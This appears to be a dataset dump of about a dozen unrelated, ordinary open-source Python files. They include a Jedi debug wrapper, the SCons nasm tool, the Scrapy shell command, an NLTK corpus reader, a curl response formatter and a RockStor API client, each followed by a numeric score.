.format(line, col))
return offset
def run_with_debug(jedi, name, *args, **kwargs):
re_raise = kwargs.pop('re_raise', ())
# Remove form feed characters, they confuse Jedi (jedi#424)
if 'source' in kwargs:
kwargs['source'] = kwargs['source'].replace("\f", " ")
try:
script = jedi.Script(*args, **kwargs)
return getattr(script, name)()
except Exception as e:
if isinstance(e, re_raise):
raise
# Bug jedi#417
if isinstance(e, TypeError) and str(e) == 'no dicts allowed':
return None
# Bug jedi#427
if isinstance(e, UnicodeDecodeError):
return None
# Bug jedi#429
if isinstance(e, IndexError):
return None
# Bug jedi#431
if isinstance(e, AttributeError) and str(e).endswith("'end_pos'"):
return None
# Bug in Python 2.6, see #275
if isinstance(e, OSError) and e.errno == 13:
return None
# Bug jedi#466
if (
isinstance(e, SyntaxError) and
"EOL while scanning string literal" in str(e)
):
return None
# Bug jedi#482
if isinstance(e, UnicodeEncodeError):
return None
# Bug jedi#485
if (
isinstance(e, ValueError) and
"invalid \\x escape" in str(e)
):
return None
# Bug jedi#485 in Python 3
if (
isinstance(e, SyntaxError) and
"truncated \\xXX escape" in str(e)
):
return None
# Bug jedi#465
if (
isinstance(e, SyntaxError) and
"encoding declaration in Unicode string" in str(e)
):
return None
# Bug #337 / jedi#471
if (
isinstance(e, ImportError) and
"No module named" in str(e)
):
return None
# Bug #365 / jedi#486 - fixed in Jedi 0.8.2
if (
isinstance(e, UnboundLocalError) and
"local variable 'path' referenced before assignment" in str(e)
):
return None
# Bug #366 / jedi#491
if (
isinstance(e, ValueError) and
"__loader__ is None" in str(e)
):
return None
# Bug #353
if (
isinstance(e, OSError) and
"No such file or directory" in str(e)
):
return None
from jedi import debug
debug_info = []
def _debug(level, str_out):
if level == debug.NOTICE:
prefix = "[N]"
elif level == debug.WARNING:
prefix = "[W]"
else:
prefix = "[?]"
debug_info.append(u"{0} {1}".format(prefix, str_out))
jedi.set_debug_function(_debug, speed=False)
try:
script = jedi.Script(*args, **kwargs)
return getattr(script, name)()
except Exception as e:
source = kwargs.get('source')
sc_args = []
sc_args.extend(repr(arg) for arg in args)
sc_args.extend("{0}={1}".format(k, "source" if k == "source"
else repr(v))
for (k, v) in kwargs.items())
data = {
"traceback": traceback.format_exc(),
"jedi_debug_info": {'script_args': ", ".join(sc_args),
'source': source,
'method': name,
'debug_info': debug_info}
}
raise rpc.Fault(message=str(e),
code=500,
data=data)
finally:
jedi.set_debug_function(None)
| 0 |
#!/usr/bin/env python
"""Rostopic time opening test module.
This is a standalone script.
In your ros_ws workspace, run:
rosrun cs473_baxter rostopic_test.py -f [FILE] -s [SECONDS]
The seconds that worked on our workstation was 0.3. We opened up the file
that contained the data from executing the command and we either got one
time interval of data or no data at all for n=10 trials.
"""
import time
import argparse
import subprocess
import rospy
def main():
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__)
parser.add_argument(
'-f', '--file', dest='filename', required=True,
help="the file to save to and the path to that file"
)
parser.add_argument(
'-s', '--seconds', dest='seconds', required=True,
help="how long to sleep"
)
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node("rostopic_time_test")
r_time = rospy.Time()
r_data = open(args.filename, 'a+')
print 'start: ' + str(r_time.now().secs) + "." + str(r_time.now().nsecs)
r_proc = subprocess.Popen(['rostopic', 'echo',
'/robot/limb/right/endpoint_state'],
stdout=r_data)
time.sleep(float(args.seconds))
r_proc.terminate()
print 'end: ' + str(r_time.now().secs) + "." + str(r_time.now().nsecs)
r_data.close()
if __name__ == '__main__':
main() | 0.006152 |
import re
import colorama
class Color(object):
@staticmethod
def green(txt):
return colorama.Fore.GREEN + txt + colorama.Fore.RESET
@staticmethod
def red(txt):
return colorama.Fore.RED + txt + colorama.Fore.RESET
@staticmethod
def blue(txt):
return colorama.Fore.BLUE + txt + colorama.Fore.RESET
@staticmethod
def dim(txt):
return colorama.Style.DIM + txt + colorama.Fore.RESET
def line_number_generator():
x = 1
while True:
yield x
x += 1
class ReconSyntaxError(Exception):
pass
class ReconReader(object):
@staticmethod
def get_lines(inp):
return ReconReader.concatenate_continuations(ReconReader.translate(inp))
@staticmethod
def translate(lines):
"""Returns an list of Line objects for every line
in the input list"""
g = line_number_generator()
return [Line(line, g.next()) for line in lines]
@staticmethod
def concatenate_continuations(lines):
"""Scans the input list for continuation lines,
and prepends their content to the OUT or IN line
that preceded them. Raises a ReconSyntaxError if the
preceding line is not an OUT or IN."""
outlines = []
lastline = None
for line in lines:
if line.type is LineType.CONTINUATION:
if lastline is None:
raise ReconSyntaxError("Line %d: The line is a CONTINUATION, but there's nothing to continue from." % line.number)
if lastline.type not in [LineType.IN, LineType.OUT]:
raise ReconSyntaxError("Line %d: Line is a CONTINUATION but the last non-continuation line is not OUT or IN." % line.number)
lastline.content += "\n" + line.content
else:
lastline = line
outlines.append(line)
return outlines
class LineType(object):
OUT = 1
IN = 2
BOOKMARK = 3
JUMP = 4
CONTINUATION = 5
QUIT = 6
@staticmethod
def to_string(linetype):
if linetype is LineType.OUT:
return "OUT"
if linetype is LineType.IN:
return " IN"
if linetype is LineType.BOOKMARK:
return "BMK"
if linetype is LineType.JUMP:
return "JMP"
if linetype is LineType.QUIT:
return "BYE"
if linetype is LineType.CONTINUATION:
return "..."
return "???"
class Line(object):
in_pattern = re.compile(r"^([0-9]+|\-+)\> ")
def __init__(self, line, number):
self.source = line
self.number = number
self.type = Line.detect_linetype(line)
self.indentation = 0
self.content = line.strip()
if self.type is not LineType.CONTINUATION:
self.indentation = Line.detect_indentation(line)
self.content = line.strip()[3:]
def __str__(self):
return "%3d %s %s %s" % (self.number, LineType.to_string(self.type), self.indentation, self.content.replace("\n", "\n "))
@staticmethod
def detect_indentation(line):
# Count the number of spaces at the start of the line.
spaces = 0
while spaces < len(line) and line[spaces] == " ":
spaces += 1
return spaces / 2
@staticmethod
def detect_linetype(line):
stripped_line = line.strip()
if stripped_line.startswith("<- "):
return LineType.OUT
if stripped_line.startswith("!B "):
return LineType.BOOKMARK
if stripped_line.startswith("!J "):
return LineType.JUMP
if stripped_line.startswith("!Q"):
return LineType.QUIT
if Line.in_pattern.match(stripped_line):
return LineType.IN
# If we couldn't detect a line type the line must
# be a paragraph continuation.
return LineType.CONTINUATION
class ReconPlayer(object):
def __init__(self, lines):
self.lines = lines
self.cursor = 0
def log(self, msg):
print Color.red("# " + msg)
def play(self, continuous=True, cursor=0, choice=None):
self.cursor = cursor
response = {
"action": "input",
"out": "",
"in": [],
"cursor": 0
}
while True:
if self.cursor >= len(self.lines):
self.log("Reached end of script - exiting.")
break
line = self.current_line()
if line.type is LineType.JUMP:
self.log("Jumping to " + line.content)
self.move_cursor_to_bookmark(line.content)
if line.type is LineType.OUT:
self.log("Speech")
print line.content, "\n"
response["out"] += line.content + "\n";
if line.type is LineType.IN:
self.log("Conversation choice")
in_lines = self.get_in_lines()
# Print the options.
response["in"] = []
option_number = 0
for line in in_lines:
option_number += 1
print "%s %s" % (Color.green(str(option_number) + ":"), line.content)
response["in"].append(line.content)
# Get input.
if continuous:
option_chosen = self.get_choice(option_number) - 1
elif choice is not None:
# Use the choice given when the function was called
option_chosen = choice
# Now the choice has been made, erase it so it doesn't get reused.
choice = None
else:
# Because play is non-continuous, return the available choices.
# The caller will call play again when a choice has been made.
response["cursor"] = self.cursor
return response
# Move the cursor to whichever line was chosen.
chosen_line = in_lines[option_chosen]
self.move_cursor_to_line(chosen_line)
print
if line.type is LineType.QUIT:
self.log("Quit")
break
if line.type is LineType.BOOKMARK:
self.log("Bookmark " + line.content + " skipped")
self.cursor += 1
response["action"] = "stop"
response["in"] = []
return response
def move_cursor_forward(self):
self.cursor += 1
def move_cursor_to_line(self, line):
self.cursor = self.lines.index(line)
def move_cursor_to_bookmark(self, name):
for line in self.lines:
if line.type is LineType.BOOKMARK and line.content == name:
self.move_cursor_to_line(line)
return
self.log("Couldn't find bookmark " + name)
def current_line(self):
return self.lines[self.cursor]
def get_in_lines(self):
"""Returns a list of all IN lines that belong to the same
set as the IN line that the cursor is on."""
indentation = self.current_line().indentation
in_lines = []
for line in self.lines[self.cursor:]:
if line.indentation < indentation:
# A dedent implies that the IN group has ended.
break
if line.indentation > indentation:
# An indent implies that this line is a child of
# a previous IN line.
continue
if line.type is LineType.IN:
# Match!
in_lines.append(line)
else:
# This line is on the same indentation level
# but is not an IN line, which implies that the
# group has ended.
break
return in_lines
def get_choice(self, max_number):
while True:
print ("Choose an option between 1 and %d:" % max_number),
inp = raw_input()
try:
inp_int = int(inp)
except ValueError:
print "That's not a number!"
else:
if inp_int > 0 and inp_int <= max_number:
return inp_int
print "That number isn't one of the available choices."
def strip_out(line):
"""Returns a string without the OUT token on the front,
if the string has one."""
if line.startswith("<-"):
return line[3:]
return line
def get_player(path):
with open(path) as f:
source = f.readlines()
lines = ReconReader.get_lines(source)
return ReconPlayer(lines)
def show_lines():
with open("recon/test.recon") as f:
source = f.readlines()
lines = ReconReader.translate(source)
lines = ReconReader.concatenate_continuations(lines)
print ""
print "DUMP"
print "===="
print
for line in lines:
print line
def play(script_name):
colorama.init()
get_player("recon/%s.recon" % script_name).play()
| 0.001857 |
"""SCons.Tool.nasm
Tool-specific initialization for nasm, the famous Netwide Assembler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001 - 2014 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/nasm.py 2014/09/27 12:51:43 garyo"
import SCons.Defaults
import SCons.Tool
import SCons.Util
ASSuffixes = ['.s', '.asm', '.ASM']
ASPPSuffixes = ['.spp', '.SPP', '.sx']
if SCons.Util.case_sensitive_suffixes('.s', '.S'):
ASPPSuffixes.extend(['.S'])
else:
ASSuffixes.extend(['.S'])
def generate(env):
"""Add Builders and construction variables for nasm to an Environment."""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in ASSuffixes:
static_obj.add_action(suffix, SCons.Defaults.ASAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
for suffix in ASPPSuffixes:
static_obj.add_action(suffix, SCons.Defaults.ASPPAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
env['AS'] = 'nasm'
env['ASFLAGS'] = SCons.Util.CLVar('')
env['ASPPFLAGS'] = '$ASFLAGS'
env['ASCOM'] = '$AS $ASFLAGS -o $TARGET $SOURCES'
env['ASPPCOM'] = '$CC $ASPPFLAGS $CPPFLAGS $_CPPDEFFLAGS $_CPPINCFLAGS -c -o $TARGET $SOURCES'
def exists(env):
return env.Detect('nasm')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 0.002674 |
"""
Scrapy Shell
See documentation in docs/topics/shell.rst
"""
from threading import Thread
from scrapy.commands import ScrapyCommand
from scrapy.shell import Shell
from scrapy.http import Request
from scrapy.utils.spider import spidercls_for_request, DefaultSpider
class Command(ScrapyCommand):
requires_project = False
default_settings = {'KEEP_ALIVE': True, 'LOGSTATS_INTERVAL': 0}
def syntax(self):
return "[url|file]"
def short_desc(self):
return "Interactive scraping console"
def long_desc(self):
return "Interactive console for scraping the given url"
def add_options(self, parser):
ScrapyCommand.add_options(self, parser)
parser.add_option("-c", dest="code",
help="evaluate the code in the shell, print the result and exit")
parser.add_option("--spider", dest="spider",
help="use this spider")
def update_vars(self, vars):
"""You can use this function to update the Scrapy objects that will be
available in the shell
"""
pass
def run(self, args, opts):
url = args[0] if args else None
spider_loader = self.crawler_process.spider_loader
spidercls = DefaultSpider
if opts.spider:
spidercls = spider_loader.load(opts.spider)
elif url:
spidercls = spidercls_for_request(spider_loader, Request(url),
spidercls, log_multiple=True)
# The crawler is created this way since the Shell manually handles the
# crawling engine, so the set up in the crawl method won't work
crawler = self.crawler_process._create_crawler(spidercls)
# The Shell class needs a persistent engine in the crawler
crawler.engine = crawler._create_engine()
crawler.engine.start()
self._start_crawler_thread()
shell = Shell(crawler, update_vars=self.update_vars, code=opts.code)
shell.start(url=url)
def _start_crawler_thread(self):
t = Thread(target=self.crawler_process.start,
kwargs={'stop_after_crawl': False})
t.daemon = True
t.start()
| 0.000912 |
import os
import sys
import numpy as np
from matplotlib import pyplot as plt
from tools import data
class ImageND(object):
SENSOR = None
def __init__(self, filename, dimensions=3):
if dimensions < 3:
print "The image doesn't have the minimum of 3 dimensions"
sys.exit(1)
self.dimensions = dimensions
self.filename = filename
self.filepath = os.path.join(data.DATA_DIR, self.filename)
self.title = filename[2:15]
def __validate(self, image):
"""
Validate image, check that's n-'dimensions' channel image
"""
if image is not None and len(image.shape) >= self.dimensions:
return True
return False
def image(self):
"""
Returns the raw ndarray image
:rtype: ndarray
"""
image = data.mat_file(self.filepath).get(self.SENSOR)
if not self.__validate(image):
print "Invalid dimensions or sensor {0} isn't in the image".format(
self.sensor)
sys.exit(1)
return np.dstack(image)
def nan_percentage(self):
nan_count = np.count_nonzero(~np.isnan(self.image()))
return (nan_count / self.image().size) * 100
def date(self):
return data.parse_date(self.filename)
def show(self, colorbar=True):
plt.imshow(self.image())
plt.title(self.filename)
if colorbar:
plt.colorbar()
plt.show()
# =====================================
# Analysis
# =====================================
def rgb(self):
"""
Return 3-tuple with (r, g, b)
"""
red = self.channel("red")
green = self.channel("green")
blue = self.channel("blue")
return (red, green, blue)
def channel(self, channel=None):
"""
This function is to be overwritten in by subclass
"""
return None
class IbandImage(ImageND):
SENSOR = "ibands"
def channel(self, channel=None):
"""
Returns a specific channel, the options are:
- red, green, blue
:params:
:params channel: string with the specified channel
:rType: ndarray
"""
if channel == 'red':
return self.image()[:, :, 0]
elif channel == 'green':
return self.image()[:, :, 1]
elif channel == 'blue':
return self.image()[:, :, 2]
else:
print "Channel requested wasn't red, green or blue"
class MbandImage(ImageND):
SENSOR = "mbands"
def channel(self, channel=None):
"""
Returns a specific channel, the options are:
- red
- blue
:params:
:params channel: string with the specified channel
:rType: ndarray
"""
channel = channel.strip().lower()
if channel == 'red':
return self.image()[:, :, 2]
elif channel == 'green':
return self.image()[:, :, 1]
elif channel == 'blue':
return self.image()[:, :, 0]
else:
print "Channel requested wasn't red, green or blue"
class FcImage(ImageND):
SENSOR = "fc"
def channel(self, channel=None):
"""
Returns a specific channel, the options are:
- red
- blue
:params:
:params channel: string with the specified channel
:rType: ndarray
"""
channel = channel.strip().lower()
if channel == 'red':
return self.image()[:, :, 0]
elif channel == 'green':
return self.image()[:, :, 1]
elif channel == 'blue':
return self.image()[:, :, 2]
else:
print "Channel requested wasn't red, green or blue"
| 0 |
# Natural Language Toolkit: Gutenberg Corpus Reader
#
# Copyright (C) 2001-2006 University of Pennsylvania
# Author: Steven Bird <[email protected]>
# Edward Loper <[email protected]>
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
"""
Read tokens from the NLTK Gutenberg Corpus.
Project Gutenberg -- http://gutenberg.net/
This corpus contains selected texts from Project Gutenberg:
* Jane Austen (3)
* William Blake (2)
* G. K. Chesterton (3)
* King James Bible
* John Milton
* William Shakespeare (3)
* Walt Whitman
"""
from en.parser.nltk_lite.corpora import get_basedir
from en.parser.nltk_lite import tokenize
import os, re
items = [
'austen-emma',
'austen-persuasion',
'austen-sense',
'bible-kjv',
'blake-poems',
'blake-songs',
'chesterton-ball',
'chesterton-brown',
'chesterton-thursday',
'milton-paradise',
'shakespeare-caesar',
'shakespeare-hamlet',
'shakespeare-macbeth',
'whitman-leaves'
]
item_name = {
'austen-emma': 'Jane Austen: Emma',
'austen-persuasion': 'Jane Austen: Persuasion',
'austen-sense': 'Jane Austen: Sense and Sensibility',
'bible-kjv': 'King James Bible',
'blake-poems': 'William Blake: Poems',
'blake-songs': 'Willian Blake: Songs of Innocence and Experience',
'chesterton-ball': 'G.K. Chesterton: The Ball and The Cross',
'chesterton-brown': 'G.K. Chesterton: The Wisdom of Father Brown',
'chesterton-thursday': 'G.K. Chesterton: The Man Who Was Thursday',
'milton-paradise': 'John Milton: Paradise Lost',
'shakespeare-caesar': 'William Shakespeare: Julius Caesar',
'shakespeare-hamlet': 'William Shakespeare: Hamlet',
'shakespeare-macbeth': 'William Shakespeare: Macbeth',
'whitman-leaves': 'Walt Whitman: Leaves of Grass',
}
def raw(files = items):
if type(files) is str: files = (files,)
for file in files:
path = os.path.join(get_basedir(), "gutenberg", file + ".txt")
f = open(path)
preamble = True
for line in f.readlines():
if not preamble:
for t in tokenize.wordpunct(line):
yield t
if line[:5] == '*END*':
preamble = False
def demo():
from en.parser.nltk_lite.corpora import gutenberg
from itertools import islice
for word in islice(gutenberg.raw('bible-kjv'), 0, 100):
print word,
if __name__ == '__main__':
demo()
| 0.003222 |
from .exceptions import CURLResponseFormatterException
from .colors import (
print_red,
print_green,
print_yellow,
print_blue,
)
from .pygments_formatter import PygmentsFormatter
class CURLResponseFormatter(object):
'''
Formats a CURL response to be nicer to read.
'''
def __init__(self, readable=None, buf=None, color_headers=False,
lexer=None, formatter=None, strip_headers=False,
color_body=True):
if readable is not None and buf is not None:
raise Exception('only pass a readable or a buf, not both')
self._color_body = color_body
self._readable = readable
self._buf = buf
self._color_headers = color_headers
self._lexer = lexer
self._formatter = formatter
self._mimetype = None
self._strip_headers = strip_headers
self._headers = []
def _set_buf(self):
if self._readable is not None:
if isinstance(self._readable, str):
# it is a file name and we should open it
try:
with open(self._readable, 'rb') as f:
self._buf = f.read()
except IOError:
raise CURLResponseFormatterException(
'passed a string `%s` that wasn\'t a readable file' %
self._readable
)
else:
# some other readable object
try:
self._buf = self._readable.read()
except AttributeError as e:
print(e)
raise CURLResponseFormatterException(
'passed a nonreadble nonfilename as readable'
)
if hasattr(self._readable, 'close'):
self._readable.close()
elif self._buf is None:
raise CURLResponseFormatterException('no readable or buf set')
if isinstance(self._buf, bytes):
self._buf = self._buf.decode('utf-8')
def _parse_body(self):
formatter = PygmentsFormatter(
lexer_alias=self._lexer, mimetype=self._mimetype,
formatter=self._formatter
)
self._buf = formatter.format_buf(self._buf, color=self._color_body)
def _parse(self):
self._set_buf()
while self._buf.startswith('HTTP'):
# Search for both of these... since some responses seem to be
# a little strange.
end1 = self._buf.find('\r\n\r\n')
end2 = self._buf.find('\n\n')
# If we found an \r\n\r\n before a \n\n use that
if end1 != -1:
end = end1
inc = 4
else:
end = end2
inc = 2
# this is an -i flag response
self._headers.append(Header(self._buf[:end]))
self._buf = self._buf[end+inc:]
if len(self._headers) >= 1:
self._mimetype = self._headers[-1].mimetype
self._parse_body()
def pretty_print(self):
self._parse()
if not self._strip_headers:
for header in self._headers:
header.pretty_print(colored=self._color_headers)
print('\n')
print(self._buf)
class Header(object):
def __init__(self, buf):
# We either have to split on \r\n or \n
headers = [h.strip() for h in buf.split('\r\n') if h.strip() != ""]
if len(headers) == 1:
headers = [h.strip() for h in buf.split('\n')]
# first index is the HTTP/VERSION CODE MSG line
self._http_line = headers.pop(0)
self._headers = headers
self.mimetype = None
# find the content type if it is there
for h in headers:
if h.lower().startswith('content-type:'):
self.mimetype = h.lower().split(':', 1)[1].strip()
if ';' in self.mimetype:
self.mimetype = self.mimetype.split(';', 1)[0]
def pretty_print(self, colored=True):
if colored:
code = self._http_line.split(' ', 2)[1].strip()
if code.startswith('5') or code.startswith('4'):
print_red(self._http_line)
elif code.startswith('2'):
print_green(self._http_line)
elif code.startswith('3'):
print_yellow(self._http_line)
else:
print(self._http_line)
for entry in self._headers:
entry = entry.split(':', 1)
print_blue(entry[0], end=': ')
print(entry[1].strip())
else:
print(self._http_line)
for entry in self._headers:
print(entry)
| 0.001036 |
# Copyright (C) 2004-2008 Paul Cochrane
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""
Example of plotting multiple curves with pyvisi
"""
import sys
numArgs = len(sys.argv)
if numArgs == 1:
ren_mod = "vtk"
else:
ren_mod = sys.argv[1]
# set up some data to plot
from numpy import *
x = arange(0, 2*pi, 0.1, dtype=floating)
y1 = sin(x)
y2 = cos(x)
y3 = cos(x)**2
# example code for how a user would write a script in pyvisi
from pyvisi import * # base level visualisation stuff
# import the objects to render the scene using the specific renderer
if ren_mod == "gnuplot":
from pyvisi.renderers.gnuplot import * # gnuplot
elif ren_mod == "vtk":
from pyvisi.renderers.vtk import * # vtk
elif ren_mod == "plplot":
from pyvisi.renderers.plplot import * # plplot
else:
raise ValueError, "Unknown renderer module"
# define the scene object
# a Scene is a container for all of the kinds of things you want to put
# into your plot for instance, images, meshes, arrow/vector/quiver plots,
# contour plots, spheres etc.
scene = Scene()
# create a LinePlot object
plot = LinePlot(scene)
# add some helpful info to the plot
plot.title = 'Example 2D plot'
plot.xlabel = 'x'
plot.ylabel = 'y'
plot.linestyle = 'lines'
# assign some data to the plot
plot.setData(x, y1, y2, y3)
# render the scene to screen
scene.render(pause=True,interactive=True)
# save the scene to file
scene.save(fname="multiCurveLinePlot.png", format=PngImage())
# vim: expandtab shiftwidth=4:
| 0.004138 |
"""
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import requests
import time
import json
import base64
import settings
from storageadmin.exceptions import RockStorAPIException
from functools import wraps
from base_console import BaseConsole
from storageadmin.models import OauthApp
from django.conf import settings
API_TOKEN = None
def set_token(client_id=None, client_secret=None, url=None, logger=None):
if (client_id is None or client_secret is None or url is None):
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
app = OauthApp.objects.get(name=settings.OAUTH_INTERNAL_APP)
client_id = app.client_id()
client_secret = app.client_secret()
url = 'https://localhost'
token_request_data = {
'grant_type': 'client_credentials',
'client_id': client_id,
'client_secret': client_secret,
}
user_pass = '{0}:{1}'.format(client_id, client_secret)
auth_string = base64.b64encode(user_pass.encode('utf-8'))
auth_headers = {'HTTP_AUTHORIZATION':
'Basic ' + auth_string.decode("utf-8"), }
response = requests.post('%s/o/token/' % url,
data=token_request_data, headers=auth_headers,
verify=False)
try:
content = json.loads(response.content.decode("utf-8"))
global API_TOKEN
API_TOKEN = content['access_token']
return API_TOKEN
except Exception, e:
if (logger is not None):
logger.exception(e)
msg = ('Exception while setting access_token for url(%s). Make sure '
'credentials are correct: %s' % (url, e.__str__()))
raise Exception(msg)
def api_error(console_func):
@wraps(console_func)
def arg_wrapper(a1, a2):
try:
return console_func(a1, a2)
except RockStorAPIException, e:
print ('Operation failed due to the following error returned '
'from the server:')
print ('-----------------------------------------')
print e.detail
print ('-----------------------------------------')
return -1
return arg_wrapper
def api_call(url, data=None, calltype='get', headers=None, save_error=True):
if (API_TOKEN is None):
set_token()
api_auth_header = {'Authorization': 'Bearer ' + API_TOKEN, }
call = getattr(requests, calltype)
try:
if (headers is not None):
headers.update(api_auth_header)
if (headers['content-type'] == 'application/json'):
r = call(url, verify=False, data=json.dumps(data),
headers=headers)
else:
r = call(url, verify=False, data=data,
headers=headers)
else:
r = call(url, verify=False, headers=api_auth_header, data=data)
except requests.exceptions.ConnectionError:
print('Error connecting to Rockstor. Is it running?')
return {}
if (r.status_code == 404):
msg = ('Invalid api end point: %s' % url)
raise RockStorAPIException(detail=msg)
if (r.status_code != 200):
try:
error_d = json.loads(r.text)
if (settings.DEBUG is True and save_error is True):
cur_time = str(int(time.time()))
err_file = '/tmp/err-%s.html' % cur_time
with open(err_file, 'w') as efo:
for line in r.text.split('\n'):
efo.write('%s\n' % line)
print('Error detail is saved at %s' % err_file)
if ('detail' in error_d):
if (error_d['detail'] == 'Authentication credentials were not provided.'):
set_token()
return api_call(url, data=data, calltype=calltype,
headers=headers, save_error=save_error)
raise RockStorAPIException(detail=error_d['detail'])
except ValueError:
raise RockStorAPIException(detail='Internal Server Error')
r.raise_for_status()
try:
ret_val = r.json()
except ValueError:
ret_val = {}
return ret_val
def print_pools_info(pools_info):
if (pools_info is None or
not isinstance(pools_info, dict) or
len(pools_info) == 0):
print('There are no pools on the appliance.')
return
try:
if ('count' not in pools_info):
pools_info = [pools_info]
else:
pools_info = pools_info['results']
print("%(c)sPools on the appliance\n%(e)s" % BaseConsole.c_params)
print("Name\tSize\tFree\tReclaimable\tRaid")
for p in pools_info:
print_pool_info(p)
except Exception, e:
print('Error displaying pool info')
def print_pool_info(p, header=False):
try:
if header:
print "%(c)sPool info%(e)s\n" % BaseConsole.c_params
print("Name\tSize\tFree\tReclaimable\tRaid")
p['size'] = sizeof_fmt(p['size'])
p['free'] = sizeof_fmt(p['free'])
p['reclaimable'] = sizeof_fmt(p['reclaimable'])
print('%s%s%s\t%s\t%s\t%s\t%s' % (BaseConsole.c, p['name'],
BaseConsole.e, p['size'], p['free'],
p['reclaimable'], p['raid']))
except Exception, e:
print e
print('Error displaying pool info')
def print_scrub_status(pool_name, scrub_info):
try:
print '%sScrub status for %s%s' % (BaseConsole.c, pool_name,
BaseConsole.e)
kb_scrubbed = None
if ('kb_scrubbed' in scrub_info):
kb_scrubbed = scrub_info['kb_scrubbed']
status = scrub_info['status']
print '%sStatus%s: %s' % (BaseConsole.c, BaseConsole.e, status)
if (status == 'finished'):
print '%sKB Scrubbed%s: %s' % (BaseConsole.c, BaseConsole.e,
kb_scrubbed)
except Exception, e:
print e
print('Error displaying scrub status')
def print_shares_info(shares):
if (shares is None or
not isinstance(shares, dict) or
len(shares) == 0):
print('There are no shares in the system')
return
try:
if ('count' not in shares):
shares = [shares]
else:
shares = shares['results']
print("%(c)sShares on the appliance%(e)s\n" % BaseConsole.c_params)
print("Name\tSize(KB)\tUsage(KB)\tPool")
for s in shares:
print_share_info(s)
except Exception, e:
print e
print('Error displaying share info')
def print_share_info(s, header=False):
try:
if header:
print "%(c)sShare info%(e)s\n" % BaseConsole.c_params
print("Name\tSize(KB)\tUsage(KB)\tPool")
print('%s\t%s\t%s\t%s' %
(s['name'], s['size'], s['r_usage'], s['pool']['name']))
except Exception, e:
print e
print('Error displaying share info')
def print_disks_info(disks_info):
if (disks_info is None or
not isinstance(disks_info, dict) or
len(disks_info) == 0):
print('There are no disks on the appliance.')
return
try:
if ('results' not in disks_info):
# POST is used, don't do anything
disks_info = disks_info
elif ('count' not in disks_info):
disks_info = [disks_info]
else:
disks_info = disks_info['results']
print("%sDisks on this Rockstor appliance%s\n" % (BaseConsole.u,
BaseConsole.e))
print("Name\tSize\tPool")
for d in disks_info:
print_disk_info(d)
except Exception, e:
print('Error displaying disk info')
def print_disk_info(d, header=False):
try:
if header:
print "%(u)sDisk info%(e)s\n" % BaseConsole.c_params
print("Name\tSize\tPool")
d['size'] = sizeof_fmt(d['size'])
print('%s%s%s\t%s\t%s' % (BaseConsole.c, d['name'],
BaseConsole.e, d['size'], d['pool_name']))
except Exception, e:
print e
print('Error displaying disk info')
def print_export_info(export_info):
if (export_info is None or
not isinstance(export_info, dict) or
len(export_info) == 0):
print('%(c)sThere are no exports for this share%(e)s' %
BaseConsole.c_params)
return
try:
if ('count' not in export_info):
export_info = [export_info]
else:
export_info = export_info['results']
if (len(export_info) == 0):
print('%(c)sThere are no exports for this share%(e)s' %
BaseConsole.c_params)
else:
print ("%(c)sList of exports for this share%(e)s" %
BaseConsole.c_params)
print("Id\tMount\tClient\tWritable\tSyncable\tEnabled")
for e in export_info:
print('%s\t%s\t%s\t%s\t%s\t%s' %
(e['id'], e['exports'][0]['mount'], e['host_str'],
e['editable'], e['syncable'], e['enabled']))
except Exception, e:
print e
print('Error displaying nfs export information')
def sizeof_fmt(num):
for x in ['K', 'M', 'G', 'T', 'P', 'E']:
if (num < 0.00):
num = 0
break
if (num < 1024.00):
break
else:
num /= 1024.00
x = 'Z'
return ("%3.2f%s" % (num, x))
| 0.000871 |
#%matplotlib inline
import sys
import pandas as pd
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
print sys.argv
if len(sys.argv) > 1:
df = pd.read_csv(sys.argv[1])
else:
df = pd.read_csv("MAPT_ExACScores.csv")
